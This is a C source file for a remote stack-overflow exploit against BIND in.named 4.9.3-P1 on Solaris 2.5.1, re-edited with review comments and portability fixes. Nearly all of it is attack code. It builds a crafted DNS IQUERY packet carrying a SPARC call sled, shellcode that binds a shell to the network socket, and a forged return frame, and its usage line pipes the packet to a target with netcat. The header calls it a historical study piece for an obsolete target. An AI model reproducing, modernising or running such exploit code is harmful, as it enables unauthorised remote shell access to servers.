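/*
 * remote in.named 4.9.3-P1 exploit example for Solaris 2.5.1
 * 4-May-1998, by stran9er  --  marked "private" and "do not use!" by its author.
 *
 * Historical proof-of-concept kept for study only; the target (BIND 4.9.3-P1 on
 * Solaris 2.5.1 / 32-bit SPARC) has been obsolete for decades.
 *
 * Credits recorded in the original:
 *   - DNS request construction after bof-test.c, written solely by
 *     Joshua J. Drake (jdrake@pulsar.net)
 *   - bug in: /in.named/ns_req.c:ns_req()
 *   - shellcode based on / ripped from dropstatd-sol24.c by an unknown author
 *
 * What the program does (everything below is visible in the code): it writes to
 * stdout one DNS message with the 2-byte length prefix DNS uses over TCP, an
 * IQUERY header with ancount=1 and a single answer RR (root name, class IN,
 * type A) whose RDATA holds a SPARC `call` sled, a 236-byte shellcode and a
 * forged register frame ending in the guessed address BUF_BEGIN + argv[1].
 * Usage, as printed: "(./a.out 0 ;cat) | netcat target 53".
 *
 * Review notes on this edit -- the payload bytes and every offset are unchanged:
 *   - the seven `#include` lines had lost their header names; they are
 *     reconstructed from the identifiers actually used (HEADER/IQUERY/C_IN/T_A,
 *     htons, fprintf, strtol, memcpy, write)
 *   - the packet layout silently assumed 32-bit `long` (ILP32 Solaris) and
 *     stored u16/u32 values through casted, odd-offset pointers; fixed-width
 *     types and explicit big-endian byte stores make the layout host-independent
 *   - `main` had an implicit int return type, the printf specifiers matched
 *     their arguments only on ILP32, the offset argument was parsed with an
 *     unchecked atoi(), and the write(2) result was ignored
 */
#include <errno.h>
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <arpa/nameser.h>
#include <arpa/nameser_compat.h>

/* Byte offsets are measured from the first byte of the answer RR (its 1-byte root name). */
#define FRAME1_UPLEN   0x200            /* offset of the forged register frame */
#define SHELLC_DOWNSET 0x100            /* shellcode sits this far below the frame */
#define BUF_LEN        (FRAME1_UPLEN - 16) /* length of the call sled (starts at offset 16) */
#define BUF_BEGIN      0xeffff730UL     /* guessed target stack address, adjusted by argv[1] */

#define SPARC_JMP      0x10800000UL     /* unused by this program; kept from the original */
#define SPARC_CALL     0x40000000UL     /* SPARC `call` opcode, displacement field zero (in words) */

/*
 * Displacement written into the sled: word c gets CALL_OFFSET - c, so every
 * word of the sled resolves to the same spot, CALL_OFFSET words past the sled
 * start. With the constants above that is byte 208 of the shellcode, the
 * xor padding just before the "entry point for sol2.5.1".
 */
#define CALL_OFFSET    (52 + (FRAME1_UPLEN - SHELLC_DOWNSET - 16) / 4)

/*
 * SPARC shellcode (Solaris syscall numbers via `ta 8`):
 * fcntl(fd, F_SETFL, 2) to clear non-blocking mode on the fd loaded from the
 * frame, close(0..7), dup the fd onto 0..2, then execve("/bin/sh", argv, envp)
 * with argv/envp built just below %sp, and _exit(1).
 *   comments marked  /** <- original code
 *   comments marked  /*+ <- author's modifications
 * The `call -55` at byte 220 lands on byte 0 with %o7 = 220; the first two
 * instructions turn that into 228, the address of "/bin/sh".
 */
static const char shellc[] =
    "\x90\x1A\xC0\x0F" /** xor %o3, %o7, %o0 */
    "\x90\x02\x20\x08" /** add %o0, 8, %o0 */
    "\x92\x02\x20\x0F" /** add %o0, 0xf, %o1 */
    "\xD0\x23\xBF\xF8" /** st %o0, [ %sp + -8 ] */
    "\xD6\x23\xBF\xFC" /** st %o3, [ %sp + -4 ] */
    "\xda\x02\x20\x78" /*+ ld [ %o0 + 0x78 ], %o5 */ /* !! */
    "\x90\x10\x00\x0d" /*+ mov %o5, %o0 */
    "\x92\x10\x20\x04" /*+ mov F_SETFL, %o1 */
    "\x94\x10\x20\x02" /*+ mov 2, %o2 !remove damn FNDELAY mode.. */
    "\x82\x10\x20\x3e" /*+ mov 62, %g1 !fcntl()*/
    "\x91\xd0\x20\x08" /*+ ta 8 */
    "\x98\x1A\xC0\x0b" /** xor %o3, %o3, %o4 */
    "\x82\x10\x20\x06" /** mov 6, %g1 ! SYS_close */
    "\x90\x1A\xC0\x0c" /** xor %o3, %o4, %o0 */
    "\x91\xd0\x20\x08" /*+ ta 8 */
    "\x80\xA3\x20\x08" /*+ cmp %o4, 8 */
    "\x12\xBF\xFF\xFD" /** bne -3 */
    "\x98\x03\x20\x01" /** inc %o4 */
    "\x98\x1A\xC0\x0b" /** xor %o3, %o3, %o4 */
    "\x82\x10\x20\x29" /** 0x29, %g1 ! SYS_dup */
    "\x90\x10\x00\x0d" /*+ mov %o5, %o0 */
    "\x91\xd0\x20\x08" /*+ ta 8 */
    "\x80\xA3\x20\x02" /** cmp %o4, 2 */
    "\x12\xBF\xFF\xFD" /** bne -3 */
    "\x98\x03\x20\x01" /** inc %o4 */
    "\xD0\x03\xBF\xF8" /** ld [ %sp + -8 ], %o0 */
    "\x92\x23\xA0\x08" /** sub %sp, 8, %o1 */
    "\x94\x23\xA0\x04" /** sub %sp, 4, %o2 */
    "\x82\x10\x20\x3b" /** mov 0x3b, %g1 ! SYS_execve */
    "\x91\xd0\x20\x08" /*+ ta 8 */
    "\x82\x10\x20\x01" /*+ mov 1, %g1 ! _exit */
    "\x91\xd0\x20\x08" /*+ ta 8 */
    /* +128: 48 bytes of xor %o3, %o3, %o3 padding; the Solaris 2.5 entry patches below jump here */
    "\x96\x1A\xC0\x0b\x96\x1A\xC0\x0b\x96\x1A\xC0\x0b\x96\x1A\xC0\x0b"
    "\x96\x1A\xC0\x0b\x96\x1A\xC0\x0b\x96\x1A\xC0\x0b\x96\x1A\xC0\x0b"
    "\x96\x1A\xC0\x0b\x96\x1A\xC0\x0b\x96\x1A\xC0\x0b\x96\x1A\xC0\x0b"
    "\x40\x00\x00\x02" /* call +2 */ /* entry point for sol2.5 */
    "\x01\x00\x00\x00" /*+ nop */
    "\x90\x10\x00\x0F" /*+ mov %o7, %o0 */
    "\xda\x02\x20\xA4" /*+ ld [ %o0 + 0xA4 ], %o5 */ /* !! */
    "\xda\x22\x20\xAC" /*+ st %o5, [ %o0 + 0xAC ] */ /* !! */
    "\x10\x80\x00\x03" /*+ b +3 */
    "\x96\x1A\xC0\x0b" /*+ xor %o3, %o3, %o3 */
    "\x96\x1A\xC0\x0b" /*+ will be damaged */
    "\x96\x1A\xC0\x0b" /** xor %o3, %o3, %o3 */
    /* entry point for sol2.5.1 */
    "\x96\x1A\xC0\x0b" /** xor %o3, %o3, %o3 */
    /* "\x00\x00\x00\x00"  debug trap, disabled in the original */
    "\x9C\x23\xA1\x80" /** sub %sp, 0x180, %sp */
    "\x7F\xFF\xFF\xC9" /*+ call -55 */
    "\x96\x1A\xC0\x0b" /** xor %o3, %o3, %o3 */
    "/bin" "/sh\x00";

#define SHELLC_LEN      (sizeof(shellc) - 1)    /* 236 bytes, terminating NUL not sent */

/* Forged register frame written right after the sled; the placeholder word is
 * replaced by the guessed address at build time. */
#define RET_PLACEHOLDER 0x12345678UL
static const uint32_t frame2[] = {
    0xefffe000, 0x00000000, 0x00000001, 0xefffe000,
    0x00000000, 0x00000000, 0x00000000, 0x00000000,
    0xefffe000, 0xefffe000, 0xefffe000, 0xefffe000,
    0xefffe000, 0xffffffff, 0xefffe000, RET_PLACEHOLDER
};
#define FRAME2_LEN      sizeof(frame2)          /* 64 bytes */

/*
 * Wire layout of what is written to stdout (sizes equal the original's
 * sizeof(HEADER) + sizeof(rrecord) + 2, with the RR struct's 1-byte root name):
 *
 *   [2]  length prefix = MSG_LEN
 *   [12] DNS HEADER
 *   [1]  RR name: root (0x00)
 *   [2]  class  [2] type  [4] ttl (zero)  [2] rdlength = RDLENGTH
 *   [..] RDATA: 5 zero bytes, the call sled (offset 16..FRAME1_UPLEN, shellcode
 *        overlaid at FRAME1_UPLEN-SHELLC_DOWNSET), then the forged frame
 */
#define RR_FIXED_LEN    (2 + 2 + 4 + 2)
#define RR_TOTAL_LEN    (FRAME1_UPLEN + FRAME2_LEN)        /* name + fixed fields + rdata */
#define RDLENGTH        (RR_TOTAL_LEN - 1 - RR_FIXED_LEN)  /* 565 */
#define MSG_LEN         (sizeof(HEADER) + RR_TOTAL_LEN)    /* 588 */
#define PKT_LEN         (2 + MSG_LEN)                      /* 590 */

/* Store v big-endian (network order) at p, regardless of host byte order or alignment. */
static void put16(unsigned char *p, uint16_t v)
{
    p[0] = (unsigned char)(v >> 8);
    p[1] = (unsigned char)v;
}

static void put32(unsigned char *p, uint32_t v)
{
    p[0] = (unsigned char)(v >> 24);
    p[1] = (unsigned char)(v >> 16);
    p[2] = (unsigned char)(v >> 8);
    p[3] = (unsigned char)v;
}

/* write(2) all n bytes to fd, retrying on short writes and EINTR; 0 on success, -1 on error (errno set). */
static int write_all(int fd, const unsigned char *p, size_t n)
{
    while (n > 0) {
        ssize_t w = write(fd, p, n);
        if (w < 0) {
            if (errno == EINTR)
                continue;
            return -1;
        }
        p += (size_t)w;
        n -= (size_t)w;
    }
    return 0;
}

/*
 * argv[1]: signed decimal offset added (mod 2^32) to BUF_BEGIN to form the
 * address placed in the forged frame. The finished packet goes to stdout;
 * diagnostics go to stderr. Exit status 1 on usage error, bad offset or a
 * failed write.
 */
int main(int argc, char **argv)
{
    unsigned char pkt[PKT_LEN];
    unsigned char *rr;          /* first byte of the answer RR */
    HEADER hdr;
    uint32_t stack = BUF_BEGIN;
    long offset;
    char *end;
    size_t c;

    fprintf(stderr, "* Solaris 2.5.1 in.named 4.9.3-P1 exploit example by stran9er \n");
    if (argc < 2) {
        fprintf(stderr, "usage: (%s 0 ;cat) | netcat target 53\n", argv[0]);
        exit(1);
    }

    /* The original used atoi(); reject non-numeric or out-of-range input instead of silently using 0. */
    errno = 0;
    offset = strtol(argv[1], &end, 10);
    if (end == argv[1] || *end != '\0' || errno == ERANGE) {
        fprintf(stderr, "bad offset: %s\n", argv[1]);
        exit(1);
    }
    stack += (uint32_t)offset;  /* 32-bit modular add, as on the ILP32 original */
    fprintf(stderr, "\nAddress: 0x%" PRIx32 " Offset: %ld\n", stack, offset);

    memset(pkt, 0, sizeof pkt);
    put16(pkt, (uint16_t)MSG_LEN);      /* DNS-over-TCP length prefix */

    /* Header: rand() is never seeded, so the id is identical on every run (as in the original). */
    memset(&hdr, 0, sizeof hdr);
    hdr.id = rand() & 0xfff;
    hdr.opcode = IQUERY;
    hdr.ancount = htons(1);
    memcpy(pkt + 2, &hdr, sizeof hdr);

    rr = pkt + 2 + sizeof(HEADER);
    /* rr[0] is the root name (zero from memset); fixed fields follow; ttl at rr+5 stays zero. */
    put16(rr + 1, C_IN);
    put16(rr + 3, T_A);
    put16(rr + 9, (uint16_t)RDLENGTH);

    /* 1. call sled: BUF_LEN/4 `call` words from offset 16 up to the frame. */
    for (c = 0; c < BUF_LEN / 4; c++)
        put32(rr + 16 + 4 * c, (uint32_t)(SPARC_CALL + CALL_OFFSET - c));

    /* 2. forged frame directly after the sled; placeholder -> guessed address. */
    for (c = 0; c < FRAME2_LEN / 4; c++)
        put32(rr + FRAME1_UPLEN + 4 * c,
              frame2[c] == RET_PLACEHOLDER ? stack : frame2[c]);

    /* 3. shellcode overlays the upper part of the sled. */
    memcpy(rr + FRAME1_UPLEN - SHELLC_DOWNSET, shellc, SHELLC_LEN);

    /* 4. Solaris 2.5 entry points for zero offset (from the original): two sled
     *    words rewritten as `call`s that both land on shellcode byte 128. */
    put32(rr + FRAME1_UPLEN - SHELLC_DOWNSET + 128 - 356,
          (uint32_t)(SPARC_CALL + 356 / 4));   /* sol2.5 restarted */
    put32(rr + FRAME1_UPLEN - SHELLC_DOWNSET + 128 - 308,
          (uint32_t)(SPARC_CALL + 308 / 4));   /* sol2.5 first */

    if (write_all(STDOUT_FILENO, pkt, sizeof pkt) != 0) {
        perror("write");
        return 1;
    }
    return 0;
}
/* www.hack.co.za [2000] */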